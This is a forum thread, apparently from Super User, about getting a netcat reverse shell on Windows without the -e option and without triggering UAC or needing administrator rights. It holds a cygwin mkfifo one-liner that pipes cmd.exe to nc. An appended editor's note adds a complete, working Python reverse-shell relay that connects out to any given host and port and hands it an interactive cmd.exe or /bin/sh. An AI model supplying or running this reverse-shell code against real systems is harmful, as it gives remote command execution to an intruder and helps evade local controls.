Reverse shell using netcat on windows (no -e option)

1

Is there any way to get a reverse shell in Windows using netcat without using -e option since it triggers UAC?

I made it work from Linux to Linux by using a named pipe. I wanted to achieve something similar in Windows.

Running c:\windows\system32\cmd.exe | ncat -l -p 666 on Windows gives me a prompt in Linux when I connect:

# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user> dir

^C

It looks like I'm close, maybe something simple is missing? If only there were named pipes in Windows...

Adriano_epifas

Posted 2017-12-12T05:18:00.970

Reputation: 140

Answers

1

I'm not sure if you can do it with pure win32 netcat, but you can do it in cygwin. Listen on 1234 like nc -l 1234, then connect to that in a separate window with this command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f

Note the up and down keys do not work to cycle through the command history using this method.

Jay

Posted 2017-12-12T05:18:00.970

Reputation: 21

Thanks for posting this, Jay. But I believe you need Admin priv to install cygwin and that defeats the purpose of it. – Adriano_epifas – 2017-12-12T17:31:00.790
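Editor's note on why the pipeline in the question stalls and what the FIFO in Jay's answer supplies: in cmd.exe | ncat -l -p 666 only one direction is wired. cmd's stdout flows into ncat, so the remote side sees the banner and the prompt, but whatever the remote types is written to ncat's own stdout (the local console), never to cmd's stdin. The mkfifo one-liner closes that loop: nc's received bytes go into the FIFO, cat feeds the FIFO into the shell's stdin, and the shell's stdout (plus stderr via 2>&1) goes back into nc. The following is an added example, not code from either poster, that implements the same loop in Python so it runs on Windows without cygwin and on Linux alike; it assumes a Python interpreter is present on the host (an assumption, just as cygwin was) and that the listener is an ordinary nc -l on the other end. The host and port are taken from the command line; ECHO_SHELL and loopback_demo() are a constructed stand-in shell and a loopback harness added here so the relay can be exercised offline, and DEFAULT_SHELL is the editor's choice of cmd.exe / /bin/sh.

```python
"""Bidirectional shell <-> socket relay: the loop that mkfifo builds on Unix."""
import os
import socket
import subprocess
import sys
import threading

# Assumed default shell per platform (editor's choice): cmd.exe on Windows, /bin/sh elsewhere.
DEFAULT_SHELL = ["cmd.exe"] if os.name == "nt" else ["/bin/sh"]


def relay(sock, shell_cmd):
    """Wire one connected socket to one shell process; block until either side closes.

    socket -> shell stdin          (the cat /tmp/f | shell half of the FIFO one-liner)
    shell stdout+stderr -> socket  (the shell 2>&1 | nc half)
    """
    proc = subprocess.Popen(
        shell_cmd,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,  # merge stderr so error text reaches the remote end (2>&1)
        bufsize=0,                 # raw pipes: read() returns whatever is available
    )

    def sock_to_stdin():
        try:
            while True:
                data = sock.recv(4096)
                if not data:       # remote hung up
                    break
                proc.stdin.write(data)
                proc.stdin.flush()
        except OSError:
            pass
        finally:
            try:
                proc.stdin.close()  # EOF to the shell so it exits when the client hangs up
            except OSError:
                pass

    def stdout_to_sock():
        try:
            while True:
                chunk = proc.stdout.read(4096)
                if not chunk:      # shell exited
                    break
                sock.sendall(chunk)
        except OSError:
            pass
        finally:
            try:
                sock.shutdown(socket.SHUT_WR)  # tell the remote end we are done sending
            except OSError:
                pass

    t_in = threading.Thread(target=sock_to_stdin, daemon=True)
    t_out = threading.Thread(target=stdout_to_sock, daemon=True)
    t_in.start()
    t_out.start()
    t_out.join()                   # shell stdout closed: shell exited or socket died
    proc.wait()
    try:
        sock.shutdown(socket.SHUT_RDWR)  # wakes a recv() still blocked in sock_to_stdin
    except OSError:
        pass
    sock.close()
    return proc.returncode


def reverse_shell(host, port, shell_cmd=None):
    """Connect out to host:port (where nc -l is waiting) and hand the socket to relay()."""
    sock = socket.create_connection((host, port))
    return relay(sock, shell_cmd or DEFAULT_SHELL)


# Constructed stand-in for cmd.exe (added for the demo): reads lines on stdin and
# echoes them upper-cased, so the relay can be exercised without a real shell.
ECHO_SHELL = [sys.executable, "-u", "-c",
              "import sys\n"
              "for line in sys.stdin:\n"
              "    sys.stdout.write(line.upper())\n"
              "    sys.stdout.flush()\n"]


def loopback_demo(command):
    """Play the listener's side (the `nc -l 1234` window) on 127.0.0.1 and return the
    bytes the relayed stand-in shell sends back for the given command bytes."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))      # ephemeral port, loopback only
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=reverse_shell, args=("127.0.0.1", port, ECHO_SHELL), daemon=True)
    t.start()
    conn, _ = listener.accept()
    conn.sendall(command)
    conn.shutdown(socket.SHUT_WR)        # hang up our side: the shell gets EOF and exits
    out = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            break
        out += chunk
    conn.close()
    listener.close()
    t.join(timeout=10)
    return out


if __name__ == "__main__":
    # Usage: python relay.py <listener-host> <listener-port>   (other end: nc -l -p <port>)
    reverse_shell(sys.argv[1], int(sys.argv[2]))
```

The behaviour matches the FIFO version, including its rough edges: the shell's stdin is a pipe rather than a console, so command history and line editing are unavailable, exactly as Jay notes for the cygwin variant.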